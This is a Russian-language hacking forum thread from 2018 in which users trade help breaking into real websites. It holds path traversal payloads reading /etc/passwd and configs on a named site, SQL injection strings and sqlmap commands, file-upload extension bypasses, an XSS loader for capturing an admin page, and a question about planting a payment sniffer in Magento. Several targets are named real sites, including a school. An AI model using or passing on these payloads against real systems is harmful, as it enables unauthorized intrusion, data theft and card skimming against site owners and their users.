Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки

в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать.

как можно поискать закономерности в этом цифровом path?)

BabaDook
13.01.2018, 18:13
ShpillyWilly said:
↑ (https://antichat.live/posts/4172934/)
Товарищи, помогите пллз.
Есть урл site,com/download_file.php?path=xxxxxxx/65/1 где x-разные циферки
в зависимости от того, что вводишь, скачиваются либо разные пдфки, либо пустой файл download_file.php, но наверняка же можно и чего-нибудь интересное скачать.
как можно поискать закономерности в этом цифровом path?)


site,com/download_file.php?path=../../../../../etc/passwd

site,com/download_file.php?path=file:///etc/passwd

site,com/download_file.php?path=http://site.ua

site,com/download_file.php?path= итд

ShpillyWilly
13.01.2018, 18:21
BabaDook said:
↑ (https://antichat.live/posts/4172939/)
site,com/download_file.php?path=../../../../../etc/passwd
site,com/download_file.php?path=file:///etc/passwd
site,com/download_file.php?path=
http://site.ua
site,com/download_file.php?path= итд


ессно я сразу же это попроовал)

я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...

erwerr2321
13.01.2018, 18:27
BabaDook said:
↑ (https://antichat.live/posts/4172939/)
site,com/download_file.php?path=../../../../../etc/passwd
site,com/download_file.php?path=file:///etc/passwd
site,com/download_file.php?path=
http://site.ua
site,com/download_file.php?path= итд


Спс, БабаДук!

Сразу наш0л много чего интересного в практически безнадёжных вариантах!

Плюсую

+

BabaDook
13.01.2018, 18:40
ShpillyWilly said:
↑ (https://antichat.live/posts/4172943/)
ессно я сразу же это попроовал)
я к тому, что наверняка же есть какая-то закономерность. Почему именно /65/ ? и почему последнее число всегда не больше 3х...


Ксорил числа?

алгоритм такой

ShpillyWilly
16.01.2018, 19:04
Товарищи, есть такой вопрос.

Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.

t0ma5
16.01.2018, 19:22
ShpillyWilly said:
↑ (https://antichat.live/posts/4173821/)
Товарищи, есть такой вопрос.
Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.


файлы проекта попробовать почитать, посмотреть как он с данными из бд работает

Sensoft
16.01.2018, 20:00
Metasploit показывает 3 уязвимости + модули к этим уязвимостям, но получить сессию не получается почему ?

Sensoft
16.01.2018, 20:27
ХОЗЯИН ТИП ОТКРЫТ ОПИСАНИЕ МОДУЛЬ АТАКИ

107.154.249.133 - 107.154.249.133.ip.incapdns.net (https://localhost:3790/hosts/813)

Уязвим к exploit/multi/misc/java_rmi_server

Но не подключится, это как пример на другом сервере 3 уязвимости

Octavian
26.01.2018, 23:56
Сама страница получяет такои ответ от сервера


Code:
0.72611600+15169956671.php.jpg

А в итоге картинка на странице выводется так


Code:
000/013/927/000013927615.jpg

Вопрос как все генерируется куда копать?

Muracha
28.01.2018, 22:13
Octavian said:
↑ (https://antichat.live/posts/4177762/)
Сама страница получяет такои ответ от сервера

Code:
0.72611600+15169956671.php.jpg

А в итоге картинка на странице выводется так

Code:
000/013/927/000013927615.jpg

Вопрос как все генерируется куда копать?


Пробуйте подменить заголовок application-jpg

Мне помогла статья

https://habrahabr.ru/post/148999/

Muracha
28.01.2018, 22:16
Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:


Code:
2015-11-19T15:19:41.000000Z
345d3c642a73d0f3d463fb1aba2b3e74
2015-11-19T14:39:32.670226Z

launcher
dir

auth
dir

CoolHucker
30.01.2018, 03:53
Парни подскажите что можно сделать??!

http://school2.perm.ru/administrator и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.

P.S. Есть мысли ???может кто поможет в этом направлении?

xaphan
30.01.2018, 18:21
CoolHucker said:
↑ (https://antichat.live/posts/4178981/)
Парни подскажите что можно сделать??!
http://school2.perm.ru/administrator
и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.
P.S. Есть мысли ???может кто поможет в этом направлении?


Там нет ни LFI, ни RFI. Я объясню почему так.

В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.

Данное можно трактовать как обычное раскрытие полного пути.

xaphan
30.01.2018, 18:28
Muracha said:
↑ (https://antichat.live/posts/4178504/)
Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:

Code:
2015-11-19T15:19:41.000000Z
345d3c642a73d0f3d463fb1aba2b3e74
2015-11-19T14:39:32.670226Z

launcher
dir

auth
dir



Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую этот (https://github.com/anantshri/svn-extractor) скрипт.

CoolHucker
30.01.2018, 21:39
xaphan said:
↑ (https://antichat.live/posts/4179157/)
Там нет ни LFI, ни RFI. Я объясню почему так.
В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.
Данное можно трактовать как обычное раскрытие полного пути.


Спасибо за толкование.только неужели нельзя добраться до этого сайта никак?)

panic.ker
31.01.2018, 00:04
Можно. Только за тебя это делать никто не будет. Это ветка вопросов по уязвимостям, а не по просьбам о взломе. Найди уязвимость, а растолковать и прояснить моменты-мы всегда за.

Octavian
03.02.2018, 02:55
Посоветуите нормальныи большои список bypass extension для картинок


Code:
image.php.jpg
image.jpg.php
image.php;.jpg
image.php%00.jpg
image.php\0.jpg

Muracha
04.02.2018, 16:44
xaphan said:
↑ (https://antichat.live/posts/4179163/)
Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую
этот (https://github.com/anantshri/svn-extractor)
скрипт.


спасибо! помогло!

А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд

dirb использую, dirbuster тоже но интересует более узкоспециализированное

DezMond™
04.02.2018, 17:48
Magento Version 1.8.1.0

Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?

Octavian
05.02.2018, 20:26
Есть такои XSS вектор


Code:


Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо


Code:


ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?

dmax0fw
06.02.2018, 12:40
Octavian said:
↑ (https://antichat.live/posts/4181023/)
Есть такои XSS вектор

Code:


Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо

Code:


ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?




HTML:


нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада

содержимое самого php:


PHP:

Octavian
06.02.2018, 14:19
dmax0fw said:
↑ (https://antichat.live/posts/4181251/)

HTML:


нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада
содержимое самого php:

PHP:




Не хочет


Code:


s.php


Code:


http://host/images/s/s.php


Code:
alert("1");

dmax0fw
06.02.2018, 14:28
Octavian said:
↑ (https://antichat.live/posts/4181299/)
Не хочет




HTML:


нужно дважды евалить


HTML:


первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload

Sensoft
09.02.2018, 09:42
Вопрос по SQL injection


Code:
GET /getaddr.cgi?heataccount=%5c


.SpoilerTarget" type="button">Spoiler: скриншот
https://s8.hostingkartinok.com/uploads/images/2018/02/9401410a00973654ad651fc8b40b7582.png


Code:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3



Code:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3

Не катит он тупа не видит

Как раскрутить кто знает ?

erwerr2321
09.02.2018, 10:48
Sensoft said:
↑ (https://antichat.live/posts/4182176/)
Как раскрутить кто знает ?


Руками может?

karkajoi
09.02.2018, 15:00
Sensoft said:
↑ (https://antichat.live/posts/4182176/)
Вопрос по SQL injection

Code:
GET /getaddr.cgi?heataccount=%5c

Spoiler: скриншот
https://s8.hostingkartinok.com/uploads/images/2018/02/9401410a00973654ad651fc8b40b7582.png

Code:
-u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3


Code:
-u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3

Не катит он тупа не видит
Как раскрутить кто знает ?


level=5 попробуй в мапе, ну и руками error based вектор пробуй.


Code:
/getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
/getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--

BabaDook
12.02.2018, 14:21
100500 waf

erwerr2321
12.02.2018, 14:54
man474019 said:
↑ (https://antichat.live/posts/4183304/)
and, what can do in this situation ?


Try boolean-based via more than 1 row )

Sensoft
12.02.2018, 15:00
http://texnousta.com/index.php?rout...Value(1,concat(0x3a,(select(versi on())))))='1 (http://texnousta.com/index.php?route=product/category&path=25_32%27or(ExtractValue(1,concat(0x3a,(select (version())))))=%271)

MotherHacker
12.02.2018, 15:27
man474019 said:
↑ (https://antichat.live/posts/4183307/)
sorry, but there waf blocks _ symbol, don't know how to bypass
++
default opencart tables have _ symbol (


look here

https://rdot.org/forum/showthread.php?t=2869

https://rdot.org/forum/showpost.php?p=18012&postcount=10

z3u5
14.02.2018, 14:51
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.

Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:


Code:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version

Что нашел:

- конфиг мускула


Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf

- конфиг фтп


Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf

- логи фтп (не нашел подключения)


Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log

Что не могу найти:

- логи апача

- способ залиться

Sensoft
14.02.2018, 14:55
z3u5 said:
↑ (https://antichat.live/posts/4184197/)
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.
Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:

Code:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version

Что нашел:
- конфиг мускула

Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf

- конфиг фтп

Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf

- логи фтп (не нашел подключения)

Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log

Что не могу найти:
- логи апача
- способ залиться


чёт не фурычит сайт )

z3u5
14.02.2018, 14:58
Sensoft said:
↑ (https://antichat.live/posts/4184200/)
чёт не фурычит сайт )


С СНГ IP может не пускать.

Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)

crlf
14.02.2018, 15:23
z3u5 said:
↑ (https://antichat.live/posts/4184197/)
Нашел LFI через сканер (netsparker)


Ниразу не LFI, это читалка. На чтение логов нет прав.

z3u5
14.02.2018, 15:30
crlf said:
↑ (https://antichat.live/posts/4184218/)
Ниразу не LFI, это читалка. На чтение логов нет прав.


Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.

Спасибо, как читалку отличить от инклуда? Пускать в логи должно?

erwerr2321
14.02.2018, 15:33
z3u5 said:
↑ (https://antichat.live/posts/4184221/)
Спасибо, как читалку отличить от инклуда? Пускать в логи должно?


код должен выполняться?

z3u5
14.02.2018, 15:38
ms13 said:
↑ (https://antichat.live/posts/4184223/)
код должен выполняться?


Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?

Я не в теме, пишу без наездов, вам все кажется.